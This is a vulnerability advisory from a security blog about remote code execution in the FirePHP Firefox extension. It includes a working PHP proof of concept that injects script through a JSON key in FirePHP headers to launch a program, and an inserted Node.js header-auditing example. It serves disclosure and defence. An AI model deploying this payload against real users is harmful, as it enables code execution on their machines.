Just Another Hacker

FirePHP firefox plugin remote code execution

FirePHP enables you to log to your Firebug Console using a simple PHP method call. All data is sent via response headers and will not interfere with the content on your page. FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required. [ Taken from: http://www.firephp.org/ ]

Vulnerability description

The extension does not sufficiently validate cell names in array data received from the remote host, resulting in arbitrary script execution in the chrome-privileged context if a user inspects the malicious data in FirePHP.

  • Discovered by: Eldar “Wireghoul” Marcussen
  • Vendor: FirePHP - http://www.firephp.org/
  • Affected versions: All versions prior to 0.7.2

Proof of Concept

<?php
/*************************************************************
 * FirePHP Firefox plugin RCE PoC                            *
 * Written by Wireghoul - http://www.justanotherhacker.com   *
 * Greetz to @bcoles urbanadventurer @malerisch              *
 *************************************************************/

// XUL code to launch calc.exe
$exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= 'process.run(true,[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data
header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
header($payload);
?>
<html>
<head>
  <title>FirePHP Firefox plugin RCE PoC</title>
</head>
<body>
PWNT!
</body>
</html>

Solution

Upgrade to version 0.7.2
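
An added example, not code from this advisory or from the FirePHP project: a Node.js check that parses single-header Wildfire messages in the `length|json|` form seen in the PoC, flags JSON key names that contain HTML metacharacters, and shows the escaped form a viewer should display instead. The function names and sample headers are constructed for illustration, and escaping keys is a generic output-encoding mitigation assumed here, not a description of the vendor's fix.

```javascript
// Added example: audit Wildfire (FirePHP) response headers for markup in key names.
// Function names and sample data are constructed for illustration.

// Message headers as used by the PoC: X-Wf-<a>-<b>-<c>-<n>: <length>|<json>|
const WF_MESSAGE = /^x-wf-\d+-\d+-\d+-\d+$/i;
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape a string so it renders as text, never as markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Recursively collect object keys (cell names) containing HTML metacharacters.
function suspiciousKeys(value, path = '$', out = []) {
  if (value !== null && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      if (/[&<>"']/.test(key)) out.push({ path, key });
      suspiciousKeys(child, `${path}.${key}`, out);
    }
  }
  return out;
}

// Parse each single-header message and report malformed or suspicious ones.
function auditWildfireHeaders(headers) {
  const findings = [];
  for (const [header, raw] of Object.entries(headers)) {
    if (!WF_MESSAGE.test(header)) continue;
    const first = raw.indexOf('|');
    const last = raw.lastIndexOf('|');
    if (first < 0 || last <= first) { findings.push({ header, error: 'malformed' }); continue; }
    const body = raw.slice(first + 1, last);
    if (Number(raw.slice(0, first)) !== Buffer.byteLength(body)) {
      findings.push({ header, error: 'length-mismatch' });
    }
    let data;
    try { data = JSON.parse(body); } catch (e) { findings.push({ header, error: 'bad-json' }); continue; }
    for (const f of suspiciousKeys(data)) findings.push({ header, ...f, escaped: escapeHtml(f.key) });
  }
  return findings;
}

// Constructed sample: one benign message and one whose key carries inert markup.
const wf = (obj) => { const j = JSON.stringify(obj); return `${Buffer.byteLength(j)}|${j}|`; };
const SAMPLE_HEADERS = {
  'X-Wf-Protocol-1': 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
  'X-Wf-1-1-1-1': wf({ RequestHeaders: { Host: 'example.test' } }),
  'X-Wf-1-1-1-2': wf({ RequestHeaders: { 'UA<b>bold</b>': 'x' } }),
};
console.log(auditWildfireHeaders(SAMPLE_HEADERS));
```

Messages split across several headers are out of scope for this check; it only handles the one-header form shown in the PoC.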

Disclosure timeline

  • 17-Apr-2013 - Public disclosure
  • 17-Apr-2013 - New version available via mozilla addons
  • 12-Apr-2013 - New version
  • 12-Apr-2013 - Vendor acknowledged vulnerability
  • 09-Apr-2013 - Vendor notified through email
